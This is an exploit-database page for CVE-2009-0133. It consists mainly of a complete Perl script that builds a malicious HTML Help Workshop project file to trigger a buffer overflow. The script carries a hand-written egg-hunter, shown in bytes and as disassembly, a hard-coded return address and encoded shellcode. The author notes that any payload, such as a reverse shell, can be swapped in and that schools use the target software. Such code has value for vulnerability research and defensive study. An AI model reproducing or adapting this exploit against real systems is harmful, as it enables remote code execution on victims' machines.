Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit

2009-01-16 / 2009-01-17
Credit: SkD
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-0133
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl # Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit # ----------------------------------------------------------------- # Discovered/Exploit by SkD (skdrat@hotmail.com) # ----------------------------------------------------------------- # # This is a continuation of my new method, shellhunting. # The exploit is far more advanced than the Amaya's as it runs on # every system, partly because the shellhunter itself is very much # reliable and universal. # The shellhunter does the following tasks to find and exec. # shellcode:- # # 1- Searches through the whole memory of the application. # 2- Installs a SEH handler so on access violations it won't # stop hunting for the shellcode. # 3- Repairs stack so a stack overflow won't occur (that is what # happens when the SEH is called up, many PUSH instructions # are called from the relevant modules (ntdll, etc). # 4- Improved speed by searching through 32 bytes at a time. # 5- Uses a certain address in memory to store a variable for the # search. # # It is very stable and will allow any shellcode (bind/reverse shell, # dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista). # # Yeah, I guess that's about it. Took me a few hours to figure out the # whole thing but nothing is impossible ;). # # Oh, I think some schools use this software :) (it's Microsoft's, right?). # # You can download the app. from Microsoft's official page: # -> http://msdn.microsoft.com/en-us/library/ms669985.aspx # # If you are interested in my method and want to learn something new or # improve your exploitation skills then visit my team's blog at: # -> http://abysssec.com # # Peace out, # SkD. my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53". "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65". "\x6E\x74\x73\x20\x66\x69\x6C\x65". "\x3D\x41\x0D\x0A\x49\x6E\x64\x65". "\x78\x20\x66\x69\x6C\x65\x3D"; my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D". "\x0A\x61\x2E\x68\x74\x6D"; my $crlf = "\x0d\x0a"; # win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". "\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x46". "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x56\x42\x32\x42\x41\x41\x32". "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x58\x69\x69\x6c\x4b". "\x58\x62\x64\x65\x50\x67\x70\x47\x70\x6c\x4b\x42\x65\x45\x6c\x6e". "\x6b\x73\x4c\x53\x35\x73\x48\x45\x51\x4a\x4f\x6c\x4b\x70\x4f\x52". "\x38\x4c\x4b\x33\x6f\x55\x70\x57\x71\x6a\x4b\x61\x59\x4c\x4b\x36". "\x54\x6e\x6b\x53\x31\x48\x6e\x55\x61\x39\x50\x4d\x49\x4c\x6c\x4d". "\x54\x6b\x70\x74\x34\x66\x67\x4b\x71\x78\x4a\x56\x6d\x67\x71\x39". "\x52\x48\x6b\x4c\x34\x35\x6b\x62\x74\x56\x44\x57\x74\x54\x35\x6b". "\x55\x4e\x6b\x31\x4f\x65\x74\x67\x71\x5a\x4b\x50\x66\x6c\x4b\x56". "\x6c\x42\x6b\x6e\x6b\x53\x6f\x47\x6c\x67\x71\x7a\x4b\x6c\x4b\x45". "\x4c\x6c\x4b\x47\x71\x48\x6b\x4f\x79\x33\x6c\x44\x64\x73\x34\x49". "\x53\x70\x31\x6b\x70\x71\x74\x4e\x6b\x73\x70\x56\x50\x4b\x35\x49". "\x50\x62\x58\x66\x6c\x4c\x4b\x43\x70\x56\x6c\x4c\x4b\x50\x70\x45". "\x4c\x4c\x6d\x6c\x4b\x35\x38\x77\x78\x78\x6b\x67\x79\x4e\x6b\x6b". "\x30\x6c\x70\x57\x70\x63\x30\x33\x30\x4c\x4b\x32\x48\x67\x4c\x73". "\x6f\x35\x61\x48\x76\x71\x70\x56\x36\x6c\x49\x4a\x58\x6e\x63\x69". "\x50\x41\x6b\x56\x30\x65\x38\x6c\x30\x6f\x7a\x75\x54\x73\x6f\x31". "\x78\x4e\x78\x79\x6e\x6f\x7a\x36\x6e\x66\x37\x6b\x4f\x5a\x47\x52". "\x43\x65\x31\x30\x6c\x70\x63\x45\x50\x46"; #/----------------Advanced Shellhunter Code----------------\ #01D717DD EB 1E JMP SHORT 01D717FD | #01D717DF 83C4 64 ADD ESP,64 | #01D717E2 83C4 64 ADD ESP,64 | #01D717E5 83C4 64 ADD ESP,64 | #01D717E8 83C4 64 ADD ESP,64 | #01D717EB 83C4 64 ADD ESP,64 | #01D717EE 83C4 64 ADD ESP,64 | #01D717F1 83C4 64 ADD ESP,64 | #01D717F4 83C4 64 ADD ESP,64 | #01D717F7 83C4 64 ADD ESP,64 | #01D717FA 83C4 54 ADD ESP,54 | #01D717FD 33FF XOR EDI,EDI | #01D717FF BA D0FAFD7F MOV EDX,7FFDFAD0 | #01D71804 8B3A MOV EDI,DWORD PTR DS:[EDX] | #01D71806 EB 0E JMP SHORT 01D71816 | #01D71808 58 POP EAX | #01D71809 83E8 3C SUB EAX,3C | #01D7180C 50 PUSH EAX | #01D7180D 6A FF PUSH -1 | #01D7180F 33DB XOR EBX,EBX | #01D71811 64:8923 MOV DWORD PTR FS:[EBX],ESP | #01D71814 EB 05 JMP SHORT 01D7181B | #01D71816 E8 EDFFFFFF CALL 01D71808 | #01D7181B B8 12121212 MOV EAX,12121212 | #01D71820 6BC0 02 IMUL EAX,EAX,2 | #01D71823 BA D0FAFD7F MOV EDX,7FFDFAD0 | #01D71828 83C7 20 ADD EDI,20 | #01D7182B 893A MOV DWORD PTR DS:[EDX],EDI | #01D7182D 3907 CMP DWORD PTR DS:[EDI],EAX | #01D7182F ^75 F7 JNZ SHORT 01D71828 | #01D71831 83C7 04 ADD EDI,4 | #01D71834 6BC0 02 IMUL EAX,EAX,2 | #01D71837 3907 CMP DWORD PTR DS:[EDI],EAX | #01D71839 ^75 E0 JNZ SHORT 01D7181B | #01D7183B 83C7 04 ADD EDI,4 | #01D7183E B8 42424242 MOV EAX,42424242 | #01D71843 3907 CMP DWORD PTR DS:[EDI],EAX | #01D71845 ^75 D4 JNZ SHORT 01D7181B | #01D71847 83C7 04 ADD EDI,4 | #01D7184A FFE7 JMP EDI | #\-----------------------End of Code----------------------/ my $shellhunter = "\xeb\x1e". "\x83\xc4\x64". "\x83\xc4\x64". "\x83\xc4\x64". "\x83\xc4\x64". "\x83\xc4\x64". "\x83\xc4\x64". "\x83\xc4\x64". "\x83\xc4\x64". "\x83\xc4\x64". "\x83\xc4\x54". "\x33\xff". "\xba\xd0\xfa\xfd\x7f". "\x8b\x3a". "\xeb\x0e". "\x58". "\x83\xe8\x3c". "\x50". "\x6a\xff". "\x33\xdb". "\x64\x89\x23". "\xeb\x05". "\xe8\xed\xff\xff\xff". "\xb8\x12\x12\x12\x12". "\x6b\xc0\x02". "\xba\xd0\xfa\xfd\x7f". "\x83\xc7\x20". "\x89\x3a". "\x39\x07". "\x75\xf7". "\x83\xc7\x04". "\x6b\xc0\x02". "\x39\x07". "\x75\xe0". "\x83\xc7\x04". "\xb8\x42\x42\x42\x42". "\x39\x07". "\x75\xd4". "\x83\xc7\x04". "\xff\xe7"; my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64; my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64; my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64; my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64; my $len = 280 - (length($shellhunter) + 55); my $overflow1 = "\x41" x $len; my $overflow2 = "\x41" x 55; my $overflow3 = "\x42" x 256; my $ret = "\x93\x1f\x40\x00"; #0x00401f93 CALL EDI [hhw.exe] open(my $hhpprj_file, "> s.hhp"); print $hhpprj_file $hhp_data1. $overflow1.$shellhunter.$overflow2.$ret. $crlf.$crlf. $hhp_data2. $overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3. $crlf; close $hhpprj_file;

References:

http://www.milw0rm.com/exploits/7727


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top